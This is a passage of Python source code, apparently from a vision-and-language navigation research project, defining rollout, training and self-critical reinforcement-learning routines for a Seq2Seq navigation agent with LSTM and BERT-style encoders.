# the per-sentence permutation for the i-th sentence (i = 1, 2 or 3) is carried inside seq_lengths,
# i.e. seq_lengths = [(seq_lengths, perm_idx), (seq_lengths, perm_idx), (seq_lengths, perm_idx)]
# Record starting point
traj = [{'instr_id': ob['instr_id'], 'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]} for ob in perm_obs]
# Forward through encoder, giving initial hidden state and memory cell for decoder
ctx, h_t, c_t, seq_mask = self.encoder(seq, seq_mask, seq_lengths)
if not self.decoder_init:
#h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
c_t = torch.zeros_like(c_t) # debug
# Initial action
a_t_prev, u_t_prev = None, None # different action space
if self.decoder.action_space == -1:
u_t_prev = self.decoder.u_begin.expand(batch_size, -1)
else:
a_t_prev = Variable(torch.ones(batch_size).long() * self.model_actions.index('<start>'), requires_grad=False).to(device)
ended = np.array([False] * batch_size) # Indices match the permutation used by the model, not the env
# Do a sequence rollout and calculate the loss
self.loss = 0
self.loss_ctrl_f = 0
env_action = [None] * batch_size
# for plot
#all_alpha = []
action_scores = np.zeros((batch_size,))
for t in range(self.episode_len):
f_t = self._feature_variable(perm_obs)
# Image features from obs
if self.decoder.panoramic: f_t_all, f_t = f_t
else: f_t_all = np.zeros((batch_size, 1))
# Action feature from obs
if self.decoder.action_space == 6:
u_t_features, is_valid = np.zeros((batch_size, 1)), None
else:
u_t_features, is_valid, _ = self._action_variable(perm_obs)
# Supervised training
target = self._teacher_action(perm_obs, ended)
h_t, c_t, alpha, logit, pred_f = self.decoder(a_t_prev, u_t_prev, u_t_features, f_t, f_t_all, h_t, c_t, ctx, seq_mask)
# all_alpha.append(alpha)
# Mask outputs where agent can't move forward
if self.decoder.action_space == 6:
for i,ob in enumerate(perm_obs):
if len(ob['navigableLocations']) <= 1:
logit[i, self.model_actions.index('forward')] = -float('inf')
else:
logit[is_valid == 0] = -float('inf')
# if self.decoder.ctrl_feature:
# pred_f[is_valid == 0] = 0
if self.temp_alpha != 0: # add temperature
logit = logit/self.temp_alpha
self.loss += self.criterion(logit, target)
# Auxiliary training
if self.decoder.ctrl_feature:
target_f = self._teacher_feature(perm_obs, ended)#, is_valid.shape[-1])
self.loss_ctrl_f += self.aux_ratio * self.criterion_ctrl_f(pred_f, target_f)
# todo: add auxiliary tasks to sc-rl training?
# Determine next model inputs
# scheduled sampling
if self.schedule_ratio >= 0 and self.schedule_ratio <= 1:
sample_feedback = random.choices(['sample', 'teacher'], [self.schedule_ratio, 1 - self.schedule_ratio], k=1)[0] # schedule sampling
if self.feedback != 'argmax': # ignore test case
self.feedback = sample_feedback
a_t = self.get_next(self.feedback, target, logit)
# setting A
if self.testing_settingA:
log_probs = F.log_softmax(logit, dim=1).data
action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
# log_probs = F.log_softmax(logit, dim=1).data
# action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
a_t_prev = a_t
if self.decoder.action_space != 6: # update the previous action
u_t_prev = u_t_features[np.arange(batch_size), a_t, :].detach()
# Updated 'ended' list and make environment action
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
ended[i] = True
env_action[idx] = self.env_actions[action_idx]
else:
if action_idx == 0:
ended[i] = True
env_action[idx] = action_idx
# state transitions
new_states = self.env.step(env_action, obs)
obs = np.array(self.env._get_obs(new_states))
#obs = np.array(self.env._get_obs(self.env.step(env_action, obs))) # , sub_stages
perm_obs = obs[perm_idx]
# Save trajectory output
for i,ob in enumerate(perm_obs):
if not ended[i]:
traj[i]['path'].append((ob['viewpoint'], ob['heading'], ob['elevation']))
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.testing_settingA:
if not ended[i]:
action_scores[idx] = action_scores[idx] + action_score[i]
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
ended[i] = True
else:
if action_idx == 0:
ended[i] = True
# Early exit if all ended
if ended.all(): break
# episode_len is a constant, so omitting the division below only rescales the logged loss
self.losses.append(self.loss.item()) # / self.episode_len)
if self.decoder.ctrl_feature:
self.losses_ctrl_f.append(self.loss_ctrl_f.item()) # / self.episode_len)
# with open('preprocess/alpha.pkl', 'wb') as alpha_f: # TODO: remove for release!!!!
# pickle.dump(all_alpha, alpha_f)
# record the trajectory score so that one of the three instructions can later be chosen according to probability
if self.testing_settingA:
for t, p in zip(traj, action_scores):
t['prob'] = p
return traj
def img_shrink(self, feat_all):
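# Shrinks a panoramic feature tensor: the last 128 dims are treated as the action/orientation
# embedding, duplicated, and the concatenation is subsampled with stride 3 along the feature
# axis, reducing the feature dimension to roughly one third.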
feat_dim = feat_all.shape[-1]
f_t, act_t = feat_all[:,:, :feat_dim-128], feat_all[:,:,-128:]
shrink = torch.cat([f_t, act_t, act_t], -1)[:,:,::3]
return shrink
def bert_rollout_with_loss(self):
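# Variant of rollout_with_loss for multimodal BERT encoders: the instruction is re-encoded together
# with the current panoramic features (f_t_all) at every time step, the encoder's hidden/cell states
# seed the decoder only at t == 0, and afterwards the decoder unrolls as a normal LSTM.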
world_states = self.env.reset(False)
obs = np.array(self.env._get_obs(world_states))
batch_size = len(obs)
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch(obs)
perm_obs = obs[perm_idx]
# When there are multiple sentences, perm_idx is simply range(batch_size);
# the per-sentence permutation for the i-th sentence (i = 1, 2 or 3) is carried inside seq_lengths,
# i.e. seq_lengths = [(seq_lengths, perm_idx), (seq_lengths, perm_idx), (seq_lengths, perm_idx)]
# Record starting point
traj = [{'instr_id': ob['instr_id'], 'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]} for ob in perm_obs]
## Forward through encoder, giving initial hidden state and memory cell for decoder
#f_t = self._feature_variable(perm_obs)
#if self.decoder.panoramic: f_t_all, f_t = f_t
#else: f_t_all = np.zeros((batch_size, 1))
#ctx, h_t, c_t, seq_mask = self.encoder(seq, seq_mask, seq_lengths,f_t_all=f_t_all)
###ctx, en_ht, en_ct, vl_mask = self.encoder(seq, seq_mask, seq_lengths,f_t_all=f_t_all)
#if not self.decoder_init:
# h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
# #c_t = torch.zeros_like(c_t) # debug
# Initial action
a_t_prev, u_t_prev = None, None # different action space
if self.decoder.action_space == -1:
u_t_prev = self.decoder.u_begin.expand(batch_size, -1)
else:
a_t_prev = Variable(torch.ones(batch_size).long() * self.model_actions.index('<start>'), requires_grad=False).to(device)
ended = np.array([False] * batch_size) # Indices match the permutation used by the model, not the env
# Do a sequence rollout and calculate the loss
self.loss = 0
self.loss_ctrl_f = 0
env_action = [None] * batch_size
# for plot
#all_alpha = []
action_scores = np.zeros((batch_size,))
for t in range(self.episode_len):
f_t = self._feature_variable(perm_obs)
# Image features from obs
if self.decoder.panoramic: f_t_all, f_t = f_t
else: f_t_all = np.zeros((batch_size, 1))
# Action feature from obs
if self.decoder.action_space == 6:
u_t_features, is_valid = np.zeros((batch_size, 1)), None
else:
u_t_features, is_valid, _ = self._action_variable(perm_obs)
# Supervised training
target = self._teacher_action(perm_obs, ended)
if self.encoder.__class__.__name__ in ['MultiVilAddEncoder','MultiAddLoadEncoder','MultiHugAddEncoder']:
ctx, en_ht, en_ct, vl_mask = self.encoder(seq, seq_mask, seq_lengths, f_t_all=f_t_all)
else:
ctx, en_ht, en_ct, vl_mask = self.encoder(seq, seq_mask, torch.tensor(seq_lengths), f_t_all=f_t_all)
if t == 0: # use encoder's ht and ct as init
de_ht, de_ct, alpha, logit, pred_f = self.decoder(a_t_prev, u_t_prev, u_t_features, f_t, f_t_all, en_ht, en_ct, ctx, vl_mask)
else: # otherwise unroll as lstm
de_ht, de_ct, alpha, logit, pred_f = self.decoder(a_t_prev, u_t_prev, u_t_features, f_t, f_t_all, de_ht, de_ct, ctx, vl_mask)
# all_alpha.append(alpha)
# Mask outputs where agent can't move forward
if self.decoder.action_space == 6:
for i,ob in enumerate(perm_obs):
if len(ob['navigableLocations']) <= 1:
logit[i, self.model_actions.index('forward')] = -float('inf')
else:
logit[is_valid == 0] = -float('inf')
# if self.decoder.ctrl_feature:
# pred_f[is_valid == 0] = 0
if self.temp_alpha != 0: # add temperature
logit = logit/self.temp_alpha
self.loss += self.criterion(logit, target)
# Auxiliary training
if self.decoder.ctrl_feature:
target_f = self._teacher_feature(perm_obs, ended)#, is_valid.shape[-1])
self.loss_ctrl_f += self.aux_ratio * self.criterion_ctrl_f(pred_f, target_f)
# todo: add auxiliary tasks to sc-rl training?
# Determine next model inputs
# scheduled sampling
if self.schedule_ratio >= 0 and self.schedule_ratio <= 1:
sample_feedback = random.choices(['sample', 'teacher'], [self.schedule_ratio, 1 - self.schedule_ratio], k=1)[0] # schedule sampling
if self.feedback != 'argmax': # ignore test case
self.feedback = sample_feedback
a_t = self.get_next(self.feedback, target, logit)
# setting A
if self.testing_settingA:
log_probs = F.log_softmax(logit, dim=1).data
action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
# log_probs = F.log_softmax(logit, dim=1).data
# action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
a_t_prev = a_t
if self.decoder.action_space != 6: # update the previous action
u_t_prev = u_t_features[np.arange(batch_size), a_t, :].detach()
# Updated 'ended' list and make environment action
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
# # sub_stages[idx] = max(sub_stages[idx]-1, 0)
# # ended[i] = (sub_stages[idx]==0)
ended[i] = True
env_action[idx] = self.env_actions[action_idx]
else:
if action_idx == 0:
# # sub_stages[idx] = max(sub_stages[idx] - 1, 0)
# # ended[i] = (sub_stages[idx] == 0)
ended[i] = True
env_action[idx] = action_idx
# state transitions
new_states = self.env.step(env_action, obs)
obs = np.array(self.env._get_obs(new_states))
#obs = np.array(self.env._get_obs(self.env.step(env_action, obs))) # , sub_stages
perm_obs = obs[perm_idx]
# Save trajectory output
for i,ob in enumerate(perm_obs):
if not ended[i]:
traj[i]['path'].append((ob['viewpoint'], ob['heading'], ob['elevation']))
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.testing_settingA:
if not ended[i]:
action_scores[idx] = action_scores[idx] + action_score[i]
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
ended[i] = True
else:
if action_idx == 0:
ended[i] = True
# for i,idx in enumerate(perm_idx):
# action_idx = a_t[i].item()
# # if not ended[i]:
# # action_scores[idx] = action_scores[idx] + action_score[i]
# if self.decoder.action_space == 6:
# if action_idx == self.model_actions.index('<end>'):
# ended[i] = True
# else:
# if action_idx == 0:
# ended[i] = True
# Early exit if all ended
if ended.all(): break
# episode_len is a constant, so omitting the division below only rescales the logged loss
self.losses.append(self.loss.item()) # / self.episode_len)
if self.decoder.ctrl_feature:
self.losses_ctrl_f.append(self.loss_ctrl_f.item()) # / self.episode_len)
# with open('preprocess/alpha.pkl', 'wb') as alpha_f: # TODO: remove for release!!!!
# pickle.dump(all_alpha, alpha_f)
# record the trajectory score so that one of the three instructions can later be chosen according to probability
if self.testing_settingA:
for t, p in zip(traj, action_scores):
t['prob'] = p
return traj
def langbert_rollout_with_loss(self):
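# Variant of rollout_with_loss for a language-only BERT encoder: the instruction is encoded once
# before the rollout (f_t_all=None), the encoder states initialize the decoder at t == 0, and the
# decoder then unrolls as a normal LSTM.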
world_states = self.env.reset(False)
obs = np.array(self.env._get_obs(world_states))
batch_size = len(obs)
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch(obs)
perm_obs = obs[perm_idx]
# When there are multiple sentences, perm_idx is simply range(batch_size);
# the per-sentence permutation for the i-th sentence (i = 1, 2 or 3) is carried inside seq_lengths,
# i.e. seq_lengths = [(seq_lengths, perm_idx), (seq_lengths, perm_idx), (seq_lengths, perm_idx)]
# Record starting point
traj = [{'instr_id': ob['instr_id'], 'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]} for ob in perm_obs]
## Forward through encoder, giving initial hidden state and memory cell for decoder
#f_t = self._feature_variable(perm_obs)
#if self.decoder.panoramic: f_t_all, f_t = f_t
#else: f_t_all = np.zeros((batch_size, 1))
#ctx, h_t, c_t, seq_mask = self.encoder(seq, seq_mask, seq_lengths,f_t_all=f_t_all)
ctx, en_ht, en_ct, vl_mask = self.encoder(seq, seq_mask, seq_lengths,f_t_all=None)
#if not self.decoder_init:
# h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
# #c_t = torch.zeros_like(c_t) # debug
# Initial action
a_t_prev, u_t_prev = None, None # different action space
if self.decoder.action_space == -1:
u_t_prev = self.decoder.u_begin.expand(batch_size, -1)
else:
a_t_prev = Variable(torch.ones(batch_size).long() * self.model_actions.index('<start>'), requires_grad=False).to(device)
ended = np.array([False] * batch_size) # Indices match the permutation used by the model, not the env
# Do a sequence rollout and calculate the loss
self.loss = 0
self.loss_ctrl_f = 0
env_action = [None] * batch_size
# for plot
#all_alpha = []
action_scores = np.zeros((batch_size,))
for t in range(self.episode_len):
f_t = self._feature_variable(perm_obs)
# Image features from obs
if self.decoder.panoramic: f_t_all, f_t = f_t
else: f_t_all = np.zeros((batch_size, 1))
# Action feature from obs
if self.decoder.action_space == 6:
u_t_features, is_valid = np.zeros((batch_size, 1)), None
else:
u_t_features, is_valid, _ = self._action_variable(perm_obs)
# Supervised training
target = self._teacher_action(perm_obs, ended)
#ctx, en_ht, en_ct, vl_mask = self.encoder(seq, seq_mask, torch.tensor(seq_lengths), f_t_all=f_t_all)
if t == 0: # use encoder's ht and ct as init
de_ht, de_ct, alpha, logit, pred_f = self.decoder(a_t_prev, u_t_prev, u_t_features, f_t, f_t_all, en_ht, en_ct, ctx, vl_mask)
else: # otherwise unroll as lstm
de_ht, de_ct, alpha, logit, pred_f = self.decoder(a_t_prev, u_t_prev, u_t_features, f_t, f_t_all, de_ht, de_ct, ctx, vl_mask)
# all_alpha.append(alpha)
# Mask outputs where agent can't move forward
if self.decoder.action_space == 6:
for i,ob in enumerate(perm_obs):
if len(ob['navigableLocations']) <= 1:
logit[i, self.model_actions.index('forward')] = -float('inf')
else:
logit[is_valid == 0] = -float('inf')
# if self.decoder.ctrl_feature:
# pred_f[is_valid == 0] = 0
if self.temp_alpha != 0: # add temperature
logit = logit/self.temp_alpha
self.loss += self.criterion(logit, target)
# Auxiliary training
if self.decoder.ctrl_feature:
target_f = self._teacher_feature(perm_obs, ended)#, is_valid.shape[-1])
self.loss_ctrl_f += self.aux_ratio * self.criterion_ctrl_f(pred_f, target_f)
# todo: add auxiliary tasks to sc-rl training?
# Determine next model inputs
# scheduled sampling
if self.schedule_ratio >= 0 and self.schedule_ratio <= 1:
sample_feedback = random.choices(['sample', 'teacher'], [self.schedule_ratio, 1 - self.schedule_ratio], k=1)[0] # schedule sampling
if self.feedback != 'argmax': # ignore test case
self.feedback = sample_feedback
a_t = self.get_next(self.feedback, target, logit)
# setting A
if self.testing_settingA:
log_probs = F.log_softmax(logit, dim=1).data
action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
# log_probs = F.log_softmax(logit, dim=1).data
# action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
a_t_prev = a_t
if self.decoder.action_space != 6: # update the previous action
u_t_prev = u_t_features[np.arange(batch_size), a_t, :].detach()
# Updated 'ended' list and make environment action
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
# # sub_stages[idx] = max(sub_stages[idx]-1, 0)
# # ended[i] = (sub_stages[idx]==0)
ended[i] = True
env_action[idx] = self.env_actions[action_idx]
else:
if action_idx == 0:
# # sub_stages[idx] = max(sub_stages[idx] - 1, 0)
# # ended[i] = (sub_stages[idx] == 0)
ended[i] = True
env_action[idx] = action_idx
# state transitions
new_states = self.env.step(env_action, obs)
obs = np.array(self.env._get_obs(new_states))
#obs = np.array(self.env._get_obs(self.env.step(env_action, obs))) # , sub_stages
perm_obs = obs[perm_idx]
# Save trajectory output
for i,ob in enumerate(perm_obs):
if not ended[i]:
traj[i]['path'].append((ob['viewpoint'], ob['heading'], ob['elevation']))
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.testing_settingA:
if not ended[i]:
action_scores[idx] = action_scores[idx] + action_score[i]
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
ended[i] = True
else:
if action_idx == 0:
ended[i] = True
# for i,idx in enumerate(perm_idx):
# action_idx = a_t[i].item()
# # if not ended[i]:
# # action_scores[idx] = action_scores[idx] + action_score[i]
# if self.decoder.action_space == 6:
# if action_idx == self.model_actions.index('<end>'):
# ended[i] = True
# else:
# if action_idx == 0:
# ended[i] = True
# Early exit if all ended
if ended.all(): break
# episode_len is a constant, so omitting the division below only rescales the logged loss
self.losses.append(self.loss.item()) # / self.episode_len)
if self.decoder.ctrl_feature:
self.losses_ctrl_f.append(self.loss_ctrl_f.item()) # / self.episode_len)
# with open('preprocess/alpha.pkl', 'wb') as alpha_f: # TODO: remove for release!!!!
# pickle.dump(all_alpha, alpha_f)
# record the trajectory score so that one of the three instructions can later be chosen according to probability
if self.testing_settingA:
for t, p in zip(traj, action_scores):
t['prob'] = p
return traj
def test(self, use_dropout=False, feedback='argmax', allow_cheat=False, beam_size=1, successors=1, speaker=(None,None,None,None)):
''' Evaluate once on each instruction in the current environment '''
if not allow_cheat: # permitted for purpose of calculating validation loss only
assert feedback in ['argmax', 'sample'] # no cheating by using teacher at test time!
self.feedback = feedback
if use_dropout:
self.encoder.train()
self.decoder.train()
else:
self.encoder.eval()
self.decoder.eval()
super(Seq2SeqAgent, self).test(beam_size, successors, speaker)
def train(self, encoder_optimizer, decoder_optimizer, n_iters, aux_n_iter, feedback='teacher'):
''' Train for a given number of iterations '''
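# When self.accu_n_iters > 0, gradients are accumulated: each per-rollout loss is divided by
# accu_n_iters and the optimizers only step (and zero their gradients) every accu_n_iters rollouts;
# otherwise an optimizer step is taken after every rollout.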
assert feedback in self.feedback_options
self.feedback = feedback
self.encoder.train()
self.decoder.train()
self.losses = []
self.losses_ctrl_f = []
epo_inc = 0
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
for iter in range(1, n_iters + 1):
if self.accu_n_iters == 0:
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
self.rollout()
if (not self.decoder.ctrl_feature) or (iter % aux_n_iter):
self.loss.backward()
else:
self.loss_ctrl_f.backward()
if self.clip_gradient != 0: # clip gradient
clip_gradient(encoder_optimizer, self.clip_gradient)
clip_gradient(decoder_optimizer, self.clip_gradient)
if self.clip_gradient_norm > 0: # clip gradient norm
torch.nn.utils.clip_grad_norm_(self.encoder.parameters(), self.clip_gradient_norm)
torch.nn.utils.clip_grad_norm_(self.decoder.parameters(), self.clip_gradient_norm)
encoder_optimizer.step()
decoder_optimizer.step()
epo_inc += self.env.epo_inc
else:
self.rollout()
if (not self.decoder.ctrl_feature) or (iter % aux_n_iter):
self.loss /= self.accu_n_iters
self.loss.backward()
else:
self.loss_ctrl_f.backward()
if iter % self.accu_n_iters == 0:
if self.clip_gradient != 0: # clip gradient
clip_gradient(encoder_optimizer, self.clip_gradient)
clip_gradient(decoder_optimizer, self.clip_gradient)
if self.clip_gradient_norm > 0: # clip gradient norm
torch.nn.utils.clip_grad_norm_(self.encoder.parameters(), self.clip_gradient_norm)
torch.nn.utils.clip_grad_norm_(self.decoder.parameters(), self.clip_gradient_norm)
encoder_optimizer.step()
decoder_optimizer.step()
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
epo_inc += self.env.epo_inc
return epo_inc
"""
def train(self, encoder_optimizer, decoder_optimizer, n_iters, aux_n_iter, feedback='teacher'):
''' Train for a given number of iterations '''
assert feedback in self.feedback_options
self.feedback = feedback
self.encoder.train()
self.decoder.train()
self.losses = []
self.losses_ctrl_f = []
epo_inc = 0
for iter in range(1, n_iters + 1):
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
self.rollout()
if (not self.decoder.ctrl_feature) or (iter % aux_n_iter):
self.loss.backward()
else:
self.loss_ctrl_f.backward()
if self.clip_gradient != 0: # clip gradient
clip_gradient(encoder_optimizer, self.clip_gradient)
clip_gradient(decoder_optimizer, self.clip_gradient)
if self.clip_gradient_norm > 0: # clip gradient norm
torch.nn.utils.clip_grad_norm_(self.encoder.parameters(), self.clip_gradient_norm)
torch.nn.utils.clip_grad_norm_(self.decoder.parameters(), self.clip_gradient_norm)
encoder_optimizer.step()
decoder_optimizer.step()
epo_inc += self.env.epo_inc
return epo_inc
"""
def rollout_notrain(self, n_iters): # jolin
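# Advances the environment by n_iters minibatches without running the model, presumably to keep
# the epoch/minibatch bookkeeping in sync; returns the accumulated epoch-increment counter.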
epo_inc = 0
for iter in range(1, n_iters + 1):
self.env._next_minibatch(False)
epo_inc += self.env.epo_inc
return epo_inc
def rl_rollout(self, obs, perm_obs, seq, seq_mask, seq_lengths, perm_idx, feedback,
encoder, decoder):
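# Rollout used by self-critical training. feedback 'sample1' samples actions from the policy and
# records per-step log-probabilities (seqLogprobs) plus a mask of still-active steps; 'argmax1'
# decodes greedily and serves as the baseline. No supervised loss is accumulated here.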
batch_size = len(perm_obs)
# Record starting point
traj = [{'instr_id': ob['instr_id'],
'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]
} for ob in perm_obs]
# Forward through encoder, giving initial hidden state and memory cell for decoder
ctx, h_t, c_t, seq_mask = encoder(seq, seq_mask, seq_lengths)
if not self.decoder_init:
h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
# Initial action
a_t_prev, u_t_prev = None, None # different action space
if decoder.action_space==-1:
u_t_prev = decoder.u_begin.expand(batch_size, -1)
else:
a_t_prev = Variable(torch.ones(batch_size).long() *
self.model_actions.index('<start>'), requires_grad=False).to(device)
ended=np.array([False] * batch_size)
# Do a sequence rollout but do not accumulate the supervised loss; the policy-gradient loss is computed later from rewards
# self.loss = 0
env_action = [None] * batch_size
# Initialize seq log probs for policy gradient
if feedback == 'sample1':
seqLogprobs = h_t.new_zeros(batch_size, self.episode_len)
mask = np.ones((batch_size, self.episode_len))
elif feedback == 'argmax1':
seqLogprobs, mask = None, None
else:
raise NotImplementedError('other feedback not supported.')
# only for supervised auxiliary tasks
#assert (not self.decoder.ctrl_feature) # not implemented
for t in range(self.episode_len):
f_t = self._feature_variable(perm_obs)
# Image features from obs
if decoder.panoramic: f_t_all, f_t = f_t
else: f_t_all = np.zeros((batch_size, 1))
# Action feature from obs
if decoder.action_space == 6:
u_t_features, is_valid = np.zeros((batch_size, 1)), None
else:
u_t_features, is_valid, _ = self._action_variable(perm_obs)
# Decoding actions
h_t, c_t, alpha, logit, pred_f = decoder(a_t_prev, u_t_prev, u_t_features,
f_t, f_t_all, h_t, c_t, ctx, seq_mask)
# Mask outputs where agent can't move forward
if decoder.action_space == 6:
for i,ob in enumerate(perm_obs):
if len(ob['navigableLocations']) <= 1:
logit[i, self.model_actions.index('forward')] = -float('inf')
else: logit[is_valid == 0] = -float('inf')
# Supervised training
# target = self._teacher_action(perm_obs, ended)
# self.loss += self.criterion(logit, target)
# Determine next model inputs
if feedback == 'argmax1':
_, a_t = logit.max(1)
elif feedback == 'sample1':
logprobs = F.log_softmax(logit, dim=1)
probs = torch.exp(logprobs.data)
m = D.Categorical(probs)
a_t = m.sample() # sampling an action from model
sampleLogprobs = logprobs.gather(1, a_t.unsqueeze(1))
else:
sys.exit('invalid feedback method %s'%feedback)
# if self.decoder.panoramic:
# a_t_feature = all_a_t_features[np.arange(batch_size), a_t, :].detach()
# Updated 'ended' list and make environment action
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if decoder.action_space == 6:
if ended[i] and mask is not None:
mask[i, t] = 0
elif action_idx == self.model_actions.index('<end>'):
ended[i] = True
env_action[idx] = self.env_actions[action_idx]
else:
if ended[i] and mask is not None:
mask[i, t] = 0
elif action_idx == 0: ended[i] = True
env_action[idx] = action_idx
obs = np.array(self.env._get_obs(self.env.step(env_action, obs)))
perm_obs = obs[perm_idx]
# Save trajectory output
for i,ob in enumerate(perm_obs):
if not ended[i]:
traj[i]['path'].append((ob['viewpoint'],
ob['heading'], ob['elevation']))
if seqLogprobs is not None: # feedback == 'sample1'
seqLogprobs[:, t] = sampleLogprobs.view(-1)
# Early exit if all ended
if ended.all(): break
path_res = {}
for t in traj:
path_res[t['instr_id']] = t['path']
return traj, mask, seqLogprobs, path_res
def rl_train(self, train_Eval, encoder_optimizer, decoder_optimizer,
n_iters, sc_reward_scale, sc_discouted_immediate_r_scale, sc_length_scale):
''' jolin: self-critical finetuning'''
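# Self-critical sequence training: for each minibatch, (1) run a sampling rollout that keeps
# per-step log-probs, (2) rerun the same minibatch greedily (using frozen copies when monotonic)
# as the baseline, (3) build a reward from the difference of their evaluation scores via
# get_self_critical_reward, and (4) apply the policy-gradient loss from PG_reward_criterion.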
self.losses = []
epo_inc = 0
self.encoder.train()
self.decoder.train()
for iter in range(1, n_iters + 1): # n_iters=interval
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
# copy from self.rollout():
# one minibatch (100 instructions)
world_states = self.env.reset(False)
obs = np.array(self.env._get_obs(world_states))
epo_inc += self.env.epo_inc
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch(obs)
perm_obs = obs[perm_idx]
gen_traj, mask, seqLogprobs, gen_results = self.rl_rollout(obs, perm_obs, seq, seq_mask,
seq_lengths, perm_idx, 'sample1',
self.encoder, self.decoder)
# jolin: get greedy decoding baseline
# Just like self.test(use_dropout=False, feedback='argmax').
# But we should not do env.reset_epoch(), because we do not
# test the whole split. So DON'T reuse test()!
world_states = self.env.reset_batch()
obs = np.array(self.env._get_obs(world_states))# for later 'sample' feedback batch
perm_obs = obs[perm_idx]
if self.monotonic:
encoder2, decoder2 = self.encoder2, self.decoder2
else:
self.encoder.eval()
self.decoder.eval()
encoder2, decoder2 = self.encoder, self.decoder
with torch.no_grad():
greedy_traj, _, _, greedy_res = self.rl_rollout(obs, perm_obs, seq, seq_mask,
seq_lengths, perm_idx, 'argmax1',
encoder2, decoder2)
if not self.monotonic:
self.encoder.train()
self.decoder.train()
# jolin: get self-critical reward
reward = self.get_self_critical_reward(gen_traj, train_Eval, gen_results, greedy_res, sc_reward_scale, sc_discouted_immediate_r_scale, sc_length_scale)
# jolin: RewardCriterion
self.loss = self.PG_reward_criterion(seqLogprobs, reward, mask)
self.losses.append(self.loss.item())
self.loss.backward()
#clip_gradient(encoder_optimizer)
#clip_gradient(decoder_optimizer)
if self.clip_gradient != 0: # clip gradient
clip_gradient(encoder_optimizer, self.clip_gradient)
clip_gradient(decoder_optimizer, self.clip_gradient)
if self.clip_gradient_norm > 0: # clip gradient norm
torch.nn.utils.clip_grad_norm_(self.encoder.parameters(), self.clip_gradient_norm)
torch.nn.utils.clip_grad_norm_(self.decoder.parameters(), self.clip_gradient_norm)
encoder_optimizer.step()
decoder_optimizer.step()
return epo_inc
def PG_reward_criterion(self, seqLogprobs, reward, mask):
# jolin: RewardCriterion
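# REINFORCE-style objective: loss = -sum_t(log p(a_t) * reward_t * mask_t) / sum_t(mask_t),
# where the mask zeroes out steps after an episode has ended.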
input = to_contiguous(seqLogprobs).view(-1)
reward = to_contiguous(torch.from_numpy(reward).float().to(device)).view(-1)
#mask = to_contiguous(torch.cat([mask.new(mask.size(0), 1).fill_(1), mask[:, :-1]], 1)).view(-1)
mask = to_contiguous(torch.from_numpy(mask).float().to(device)).view(-1)
output = - input * reward * mask
loss = torch.sum(output) / torch.sum(mask)
return loss
def get_self_critical_reward(self, traj, Eval, gen_results, greedy_res, sc_reward_scale, sc_discouted_immediate_r_scale, sc_length_scale):
# get self-critical reward
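# Scores the sampled and the greedy trajectories with Eval.score_batch and builds a
# (batch_size x episode_len) reward matrix according to self.reward_func (success-rate or
# SPL based, optionally assigned only to the last step), then optionally adds a discounted
# immediate reward and subtracts a trajectory-length penalty.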
instr_id_order = [t['instr_id'] for t in traj]
gen_scores = Eval.score_batch(gen_results, instr_id_order)
greedy_scores = Eval.score_batch(greedy_res, instr_id_order)
# normal score
gen_hits = (np.array(gen_scores['nav_errors']) <= 3.0).astype(float)
greedy_hits = (np.array(greedy_scores['nav_errors']) <= 3.0).astype(float)
gen_lengths = (np.array(gen_scores['trajectory_lengths'])).astype(float)
# sr_sc
hits = gen_hits - greedy_hits
#reward = np.repeat(hits[:, np.newaxis], self.episode_len, 1)*sc_reward_scale
# spl
gen_spls = (np.array(gen_scores['spl'])).astype(float)
greedy_spls = (np.array(greedy_scores['spl'])).astype(float)
ave_steps = (np.array(gen_scores['trajectory_steps'])).sum()/float(len(instr_id_order))
steps = (np.array(gen_scores['trajectory_steps']) - self.episode_len).sum()
if self.reward_func == 'sr_sc':
reward = np.repeat(hits[:, np.newaxis], self.episode_len, 1)*sc_reward_scale
elif self.reward_func == 'spl':
reward = np.repeat(gen_spls[:, np.newaxis], self.episode_len, 1) * sc_reward_scale
elif self.reward_func == 'spl_sc':
# spl_sc
spl_sc = gen_spls - greedy_spls
reward = np.repeat(spl_sc[:, np.newaxis], self.episode_len, 1) * sc_reward_scale
elif self.reward_func == 'spl_last': # does not work
tj_steps = [s - 1 for s in gen_scores['trajectory_steps']] # tj_steps
reward = np.zeros((gen_spls.shape[0], self.episode_len), dtype=float)
reward[range(gen_spls.shape[0]), tj_steps] = gen_scores['spl']
elif self.reward_func == 'spl_last_sc':
tj_steps = [s - 1 for s in gen_scores['trajectory_steps']] # tj_steps
reward = np.zeros((gen_spls.shape[0], self.episode_len), dtype=float)
